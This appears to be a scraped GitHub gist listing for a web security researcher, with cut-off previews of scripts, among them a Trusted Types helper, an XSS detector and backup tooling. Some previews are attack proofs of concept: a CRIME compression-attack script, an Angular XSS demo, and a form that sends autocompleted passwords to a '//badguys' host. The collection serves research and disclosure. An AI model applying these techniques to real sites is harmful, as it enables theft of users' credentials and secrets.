Skip to content

Instantly share code, notes, and snippets.

Krzysztof Kotowicz koto

Block or report user

Report or block koto

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
@koto
koto / example.js
Last active Sep 3, 2019
Support for custom types in Trusted Type policies.
View example.js
// Custom types for https://github.com/WICG/trusted-types/
// Allow a given TT policy to create custom unspoofable TrustedFoo instances.
const installFoo = (policy, rule, policyFactory) => {
const creatorSymbol = Symbol();
const map = new WeakMap();
// Some more defensive coding tricks can be applied here
// See https://github.com/WICG/trusted-types/blob/master/src/trustedtypes.js for inspiration.
class TrustedFoo {
@koto
koto / gist:50550bf1ab02c0de59acff51f8066202
Last active Sep 23, 2018
ZFF export screening times from your watchlist
View gist:50550bf1ab02c0de59acff51f8066202
// go to https://zff.com/en/community/users/me/watch-list/
https://github.com/wanasit/chrono
(function(f){if(typeof exports==="object"&&typeof module!=="undefined"){module.exports=f()}else if(typeof define==="function"&&define.amd){define([],f)}else{var g;if(typeof window!=="undefined"){g=window}else if(typeof global!=="undefined"){g=global}else if(typeof self!=="undefined"){g=self}else{g=this}g.chrono = f()}})(function(){var define,module,exports;return (function e(t,n,r){function s(o,u){if(!n[o]){if(!t[o]){var a=typeof require=="function"&&require;if(!u&&a)return a(o,!0);if(i)return i(o,!0);var f=new Error("Cannot find module '"+o+"'");throw f.code="MODULE_NOT_FOUND",f}var l=n[o]={exports:{}};t[o][0].call(l.exports,function(e){var n=t[o][1][e];return s(n?n:e)},l,l.exports,e,t,n,r)}return n[o].exports}var i=typeof require=="function"&&require;for(var o=0;o<r.length;o++)s(r[o]);return s})({1:[function(require,module,exports){
!function(e,d){"object"==typeof exports&&"undefined"!=typeof module&&"function"==ty
View angular 1.6 xss, no quotes,
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width">
<title>JS Bin</title>
</head>
<body>
View gist:e52022050e2828ee40bb
/**
* Imports a public key to the key server.
* @param {!e2e.openpgp.block.TransferablePublicKey} key The ASCII
* armored or {e2e.openpgp.block.TransferablePublicKey} key to import.
* @return {!e2e.async.Result.<boolean>} True if importing key is succeeded.
*/
e2e.openpgp.KeyClient.prototype.importPublicKey = function(key) {
var uids = key.getUserIds();
if (uids.length != 1) {
View gist:8678570
http://w3c.github.io/webappsec/specs/subresourceintegrity/
issues:
"3.3.2 Is resource eligible for integrity validation
In order to mitigate an attackers ability to read data cross-origin by brute-forcing values via integrity checks, resources are only eligible for such checks if they are same-origin, publically cachable, or is the result of a granted the loading origin explicit access via CORS. [CORS] The following algorithm details these restrictions:"
publically cacheable != attacker could could read them anyway. For example - cross origin intranet resources. What if intranet resource is publicly cacheable? still allows for bruteforcing intranet resource body from internet (SOP bypass)
View credtest.php
<html>
<a id=a href="http://<?php
$blacklist = ':@#"?`/\\';
for ($i = 33; $i < 255; $i++) {
if (strpos($blacklist, chr($i)) !== false) {
echo urlencode(chr($i));
} else
//echo urlencode(chr($i));
@koto
koto / xssdetect.js
Created Dec 1, 2012
reflected xss detection using xssauditor on phantomjs
View xssdetect.js
var page = require('webpage').create(),
system = require('system'),
address;
page.onInitialized = function () {
page.evaluate(function () {
// additional detection code here perhaps
// f.e. detecting STORED/DOM XSS
});
@koto
koto / crime.py
Created Sep 11, 2012
It's not a crime to build a CRIME
View crime.py
# This is supposedly what CRIME by Juliano Rizzo and Thai Duong will do
# Algorithm by Thomas Pornin, coding by xorninja, improved by @kkotowicz
# http://security.blogoverflow.com/2012/09/how-can-you-protect-yourself-from-crime-beasts-successor/
import string
import zlib
import sys
import random
charset = string.letters + string.digits + "%/+="
@koto
koto / rsync_backup
Created Jan 16, 2012
OSX Snow Leopard bootable backup script with FileVault support (backup will be unencrypted!)
View rsync_backup
#!/bin/sh
PROG=$0
# use macports rsync 3.x - Apple's 2.6 hung on sockets
RSYNC="/opt/local/bin/rsync"
SRC="/"
DST="/Volumes/Backup/"
FILEVAULT_ACCT="Users/yourusername"
# rsync options
View gist:1502692
<form action="//same-origin">
<input name=login>
<input name=password type=password>
.<!-- this will probably be autocompleted -->
<button type=submit form-action="//badguys">clickme</button>
</form>
You can’t perform that action at this time.